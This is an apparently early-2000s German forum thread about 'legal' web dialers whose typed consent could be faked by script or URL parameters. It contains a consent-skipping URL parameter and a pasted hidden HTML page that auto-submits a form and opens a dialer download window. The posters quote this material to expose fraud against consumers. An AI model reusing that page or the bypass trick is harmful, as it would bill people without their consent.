Dialer Automatisierung

O

Opfer

Frisch registriert
Hoi

Mir ist gerade etwas aufgefallen. Es gibt ja immer mehr diese "Gesetzeskonformen" Dialer bei den man ein oder mehrmal "JA" oder sonstwas eintippen muss, damit das ganze geladen wird. Bei diesen Webdialerformen wird ja auch, so wie es eigentlich sein sollte, oft eine AGB ausgewiesen, sowie die Preisstaffelung angezeigt. Was passiert aber, wenn man auf eine solche Seite gelinkt wird, und per Script oder Software die Eingabe des Wortes "JA" selbständig erfolgt ? Technisch ist das ja gar kein Problem, und ich habe das dumme Gefühl, das genau das so praktiziert wird. Unter Umständen ist es sogar noch einfacher, und es werden schon in der URL die nötigen Parameter übergeben. Was würde in einem solchen Fall passieren. Wenn man das ganze Spiel nämlich zurückverfolgen würde, würde es tatsächlich so aussehen, als wäre der Benutzer auf die Webseite gegangen und hätte die Eingaben selbst getätigt. Da man ja schon mit dem Focus rumspielen kann, und damit aufgerufene Webseiten "verstecken" kann, würde der User das gar nicht mitbekommen, und trotzdem würde es so aussehen als hätte man die Eingaben bewusst getätigt. Sollte die technische Möglichkeit ein Ansatzpunkt sein, um solche Dialer generell aus dem Verkehr zu ziehen ? Stichwort Sicherheit und so.

Opfer
 
Die Manipulationsmöglichkeiten bei Dialereinwahlen sind vielfältig. Das ist in

http://forum.webmart.de/wmmsg.cfm?id=1461578&d=90&a=1&t=1528423

berücksichtigt.

Die ausführbare Programmdatei ist oft automatisierbar. Eine Testmöglichkeit ohne Programmierkenntnisse beschreibt

http://forum.webmart.de/wmmsg.cfm?id=847952&d=90&sr=26&a=1&t=1558627

Die Zustimmung zum Bezug wird oft per Skript eingeholt. Da kann jeder Anfänger den späteren Download-Link herausfinden und Webseiten basteln, die den gleichen Dialer ohne Zustimmung zum Bezug automatisch laden.

Da Dialerdrücker für ihre Werbetätigkeit bis zu 90% der Beute als Kopfprämie bekommen, darf man davon ausgehen, dass diese Tricks tatsächlich auch angewendet werden, mit oder ohne Mitwirkung der Dialeranbieter.

Dietmar Vill
 
Wieso dürfen dann solche Dialer (ob augenscheinlich Gesetzeskonform oder nicht) überhaupt noch eingesetzt werden ? Es ist doch ganz klar das diese nicht sicher sind. Das mit der Kopfprämie war mir im übrigen neu. Ich hoffe nur, das sich bei so einem Fall der Dialeranbieter nicht aus der Verantwortung ziehen kann (sollte aber eigentlich nicht Möglich sein, da er seine Software gegen solche Manipulationen schützen sollte). Nur um das ganze mal zu verdeutlichen (beim zweiten Link ist ja von einem Programm von 4,5MB die Rede):

Eine solche Automatisierung schreibe ich in unter 2 Minuten mit einer Programmgrösse < 8kb (Das fällt dann beim Download nicht auf).

Bei einem php Script wären es nur ein paar Bytes Code.

Was mich viel mehr interesiert ist, warum die RegTP oder die BSI dann solche menipulations gefährdeten Dialer nicht generell verbietet ? Prinzipiell ist ein Dialer (von der Idee her) nichts dummes, sofern er ordentlich programiert wurde und auch nur Lokal vom Anwender aus gestartet werden kann (Also z.B als *.zip oder *.rar zum runterladen wenn Interesse besteht). Ich denke hier besteht dringend Handlungsbedarf seitens der Gesetzgeber.

Opfer
 
Was mich viel mehr interesiert ist, warum die RegTP oder die BSI dann solche menipulations gefährdeten Dialer nicht generell verbietet ?
Zum Vergrößern anklicken....

Die rechtlichen Rahmenbedingungen sind in den vergangenen Monaten bereits in vielerlei Hinsicht verbessert worden. Selbstverständlich sind auch "manipulierte" Dialer insofern verboten, als dass sie damit der Rechtskonformitätserklärung des Anbieters bei der Registrierung widersprechen würden. Zu bedenken gebe ich ferner, dass bislang noch kein Nachweis vorliegt, dass derart getürkte "OK-Dialer" tatsächlich im Einsatz sind. Dass die theoretische Möglichkeit besteht, mag ich natürlich gar nicht ausschließen...
 
@ Moritz,

was soll daran lächerlich sein?
Dialer startet bei der Installation automatisch, da Aufruf durch Parameter und später lässt er sich nur noch durch die OK Eingabe aufrufen. Und bitte streite es nicht ab, dass dies nicht technisch machbar ist.
Frage, ist jetzt der Dialer Gesetzeskonform? Soll er nicht Gesetzeskonform sein, da er sich auch durch Parameter starten lässt?

Veruschka
 
Hi

Für alle dies nicht glauben, oder die sich nicht genau vorstellen können, hab ich mal eben schnell ein kleines Beispiel gemacht.

Zur Demonstration

Dies ist nur eine Demo ! Also man kann sich da nichts einfangen oder so. Eine kurze Erläuterung noch am Rande. Das ganze besteht lediglich aus ein bisschen PHP und 4 Zeilen Javascript. Ich bin bei meinen Recherchen nämlich zufällig über eine Seite gestolpert, die recht ähnlich aufgebaut war. Man musste also auch lediglich in zwei normale Textfelder auf der Homepage "JA" eintippen um sich den Dialer einzufangen. Meine kleine Demo sollte wohl jedem klar machen, das es problemlos möglich ist, so etwas zu realisieren. Der Dumme ist wieder der User, weil er nicht beweisen kann, das er nicht selbst "JA" eingetippt hat (vor allem wenn die vorgeschalteten Link Seiten wieder verschwunden sind). Das ganze lässt sich im übrigen beliebig anpassen. So kann das ganze zum Beispiel auch ausgelöst werden wenn man eine Seite schliesst, über ein Popup oder sonstwie. Die Möglichkeiten sind (leider) unbegrenzt. Vieleicht sollte man der RegTP oder der BSI mal ein solches Beispiel vor Augen führen :p

Opfer
 
Die Trickmöglichkeiten sind vom BSI bestätigt und in der Praxis nachgewiesen. Man findet viele Berichte von Geschädigten, die sicher sind, nicht "OK" getippt zu haben.

Bei einem Anbieter z.B. muss man nur den Zusatz "&okinput=ok" der Download-URL zufügen, um den direkten Download zu starten.

Das funktioniert also schon mit einem statischen Link. Mit Skript- und php-Funktionen lässt sich viel mehr machen, das vorstehende Beispiel ist schon ganz gut.

Es ist wichtig, die Manipulationsmöglichkeiten in das allgemeine Bewusstsein zu bringen. Einige Anbieter versuchen, die Existenz eines registrierten Dialers zu einer Rufnummer quasi als Beweis der Rechtmäßigkeit für alle Einwahlen zu werten.

Das ist grober Unfug.

Dietmar Vill
 
...und wie ist das nun eigentlich mit meinem komischen doorway-Fenster??? siehe Bild. Da landete ich bei domainschrott.de und sah aber amazon. Und dahinter lag folgende website:

<html><head></head><body>
<form action='http://www.sms-stadt.com/smsstadt/' method='GET' name='frm1' target='frm1'>
<input type='hidden' name='pid' value='sst-12596'>
</form>
<script language='javascript'>
<!--
document.frm1.submit();
//-->
</script>

</form>


<script language='javascript'>
<!--
F1 = window.open("http://install.stardialer.de/download.php? account=sst-12596&account=sst-12596&layout=","StarInstall","width=480,height=360");
//-->
</script>

</body></html>


Keine Ahnung von scripts, aber da könnte mir ja jemand sonst was unterjubeln... Oder kann man denn klicks im Fenster 1 nach Fenster 2 übertragen, wenn es zB zwei Frames wären?


[edit spätnachts: Der Gast im überübernächsten Beitrag bin ich... Habe Anmeldung vergessen]

fischchen]
 

Anhänge

  • adovai.jpg
    adovai.jpg
    50,8 KB · Aufrufe: 372
Ich bekenne mich durchaus zu dieser Phobie. Damit Du auch wirklich was zu lachen hast, gebe ich Dir gratis noch die Info dazu, dass ich gar kein potentielles Opfer für dialer bin.

Aber erst einmal muss man alles ansprechen, was möglich ist oder sein kann und alle Hinweise sammeln, dann wird hier schon das Wichtige vom Unwichtigen getrennt. Da verlasse ich mich voll und ganz auf die Mods und auf die Dynamik der Diskussion (wenn etwas nicht für das Thema "illegale Dialereinwahlen" relevant ist, wird es hier auch nicht lange zum Thema, höchstens immer wieder mal kurz, was für die Vielleser evtl. lästig ist).

Gut, Du findest diesen thread also zum Lachen. Ok. Wahrscheinlich haben einige auch gelacht, als die ersten Opfer mit Hunderten von Mark/Euros auf ihren Rechnungen ankamen und sagten "Wir haben aber nichts geklickt"

Da haben so manche in ihrer Technikgläubigkeit gesagt "Das kann kein Betrug sein, die wollen's halt nicht zugeben".

Wenn da nicht alle Möglichkeiten durchgegangen worden wären und wenn sich da nicht viele Leute mit den Möglichkeiten beschäftigt hätten, dann hätte es mit Sicherheit noch immer keine Gesetzesänderung gegeben. Um da Änderungen zu erreichen, war eine gewisse Offenheit ggü. den Möglichkeiten notwendig. Damit meine ich zB: "Kann es sein, dass Dialer einmal so aussehen und einmal so?". Die Antwort auf diese Frage gibt es ja inzwischen. Oder: Kann es sein, dass Einwahlprogramme einfach verschwinden? Usw. Das waren auch "scheinbar" verrückte Fragen (und so lange ist das noch nicht her, lese hier mal die alten Beiträge)

Und lies Dir mal die Debatten des Bundestages/Bundesrates durch. Glaubst Du, dass es nicht sehr dringenden Handlungsbedarf geben musste, dass die aus parteipolitischen Gründen notorisch anzutreffende Bundesrat-Bundestag-Patt-Orgie hier immerhin ein neues Gesetz zugelassen hat? Dazu war die Auseinandersetzung auch mit scheinbar verrückten Ideen nötig. Sonst würden die heute noch um Kompetenzverteilung Bund/Länder und ähnliches Zeugs streiten.

Konkret zu meinem Bild: Es ist nicht meine Schuld, dass die Werbevermüllung von google und die dialer-Vermüllung zeitgleich stattfinden und ein Laie wie ich eben nicht das eine vom anderen trennen kann. Wenn Dich das amüsiert, kein Problem. Wenn ich ein amazon-Fenster sehe und darunter ist ein Fenster mit einem link zu einem dialer, dann mache ich mir da halt Gedanken. Ich weiß ja nicht, wie das Fenster ausgesehen hätte, wenn ich mit Modem und ohne Schutz dorthin gelangt wäre. Wenn Du lachst, sag mir doch wenigstens, was daran so unbedenklich ist, ok?
 
Anonymous schrieb:
zum Lachen oder Weinen.. oder einfach nur kurios?
Leute, habt ihr keine anderen Sorgen?
Zum Vergrößern anklicken....

@Gast & Moritz

Ok, das von mir damals gepostete Beispiel stammte vom 30.12.03 ca.

Ich habe keine Ahnung vom Programmieren, aber ich habe experimentierfreudig das skript in eine Textdatei gepackt und diese als test.html abgespeichert und mit dem IE geöffnet.

Das Ergebnis? Ich bekam eine 404-Meldung. Aber kurz vorher... siehe Bild. Und noch was: Im Internet cache war KEIN Hinweis auf irgendeine Dialereinwahl zu sehen! Da tauchte nur "SMS-Stadt" auf, was übrigens in dem oben angeführten Beispiel mit keinem Wort bei google erwähnt war!

Also ich finde das nicht zum Lachen, tut mir leid!
 

Anhänge

  • stardialerschrott.jpg
    stardialerschrott.jpg
    71,7 KB · Aufrufe: 371
automatische dealer

:evil:
Müst ihr wirklich jeden Trick veraten?

Sollten wir nicht zu Samen halten???

Mario, AWM
 
Moritz schrieb:
Jetzt wird es langsam lächerlich.
Zum Vergrößern anklicken....

Lächerlich und dumm obendrein. Eine ausführbare Programmdatei per Script steuern und ein OK simulieren.......Auweiha. Sind hier nur DAU´s unterwegs.
Es wäre einfacher die Telekomrechnung zu fälschen oder die Leitung des Nachbarn anzuzapfen oder die TAN`s der Onlinebankingsoftware zu kopieren.
Ihr habt folgende Filme zu oft gesehen und zu ernst genommen: James Bond, Matrix, Gladiator und zu letzt natürlich "Findet Nemo"

Max Grimm
 
Anonymous schrieb:
Anonymous schrieb:
zum Lachen oder Weinen.. oder einfach nur kurios?
Leute, habt ihr keine anderen Sorgen?
Zum Vergrößern anklicken....

@Gast & Moritz

Ok, das von mir damals gepostete Beispiel stammte vom 30.12.03 ca.

Ich habe keine Ahnung vom Programmieren, aber ich habe experimentierfreudig das skript in eine Textdatei gepackt und diese als test.html abgespeichert und mit dem IE geöffnet.

Das Ergebnis? Ich bekam eine 404-Meldung. Aber kurz vorher... siehe Bild. Und noch was: Im Internet cache war KEIN Hinweis auf irgendeine Dialereinwahl zu sehen! Da tauchte nur "SMS-Stadt" auf, was übrigens in dem oben angeführten Beispiel mit keinem Wort bei google erwähnt war!

Also ich finde das nicht zum Lachen, tut mir leid!
Zum Vergrößern anklicken....


Stardialerschrott? Wo isn auf SMS-Stadt ein Stardialer?
Habe nach 12 stündiger Suche keinen gefunden? Kann mir jemand helfen? Ich würde gerne so einen Sternwähler finden und mir an die Tür heften. Soll gegen Vampire und die gemeine ostindische Villmücke helfen.

Roger aus K.
 
Opfer schrieb:
Hi

Für alle dies nicht glauben, oder die sich nicht genau vorstellen können, hab ich mal eben schnell ein kleines Beispiel gemacht.

Zur Demonstration

Dies ist nur eine Demo ! Also man kann sich da nichts einfangen oder so. Eine kurze Erläuterung noch am Rande. Das ganze besteht lediglich aus ein bisschen PHP und 4 Zeilen Javascript. Ich bin bei meinen Recherchen nämlich zufällig über eine Seite gestolpert, die recht ähnlich aufgebaut war. Man musste also auch lediglich in zwei normale Textfelder auf der Homepage "JA" eintippen um sich den Dialer einzufangen. Meine kleine Demo sollte wohl jedem klar machen, das es problemlos möglich ist, so etwas zu realisieren. Der Dumme ist wieder der User, weil er nicht beweisen kann, das er nicht selbst "JA" eingetippt hat (vor allem wenn die vorgeschalteten Link Seiten wieder verschwunden sind). Das ganze lässt sich im übrigen beliebig anpassen. So kann das ganze zum Beispiel auch ausgelöst werden wenn man eine Seite schliesst, über ein Popup oder sonstwie. Die Möglichkeiten sind (leider) unbegrenzt. Vieleicht sollte man der RegTP oder der BSI mal ein solches Beispiel vor Augen führen :p

Opfer
Zum Vergrößern anklicken....

Du baust PHP-Seiten und Scripte? Und bist ein "Opfer". Wie ist denn das passiert? Hat der Drang nach Erfüllung der Fortpflanzung das logische und binärverständliche Hirn gelähmt? Oder war es ein s.g. MOBILDIALER oder KFZDIALER oder einfach gesagt ein AUTODIALER?

Hans die Wurst
 
Zurück
Oben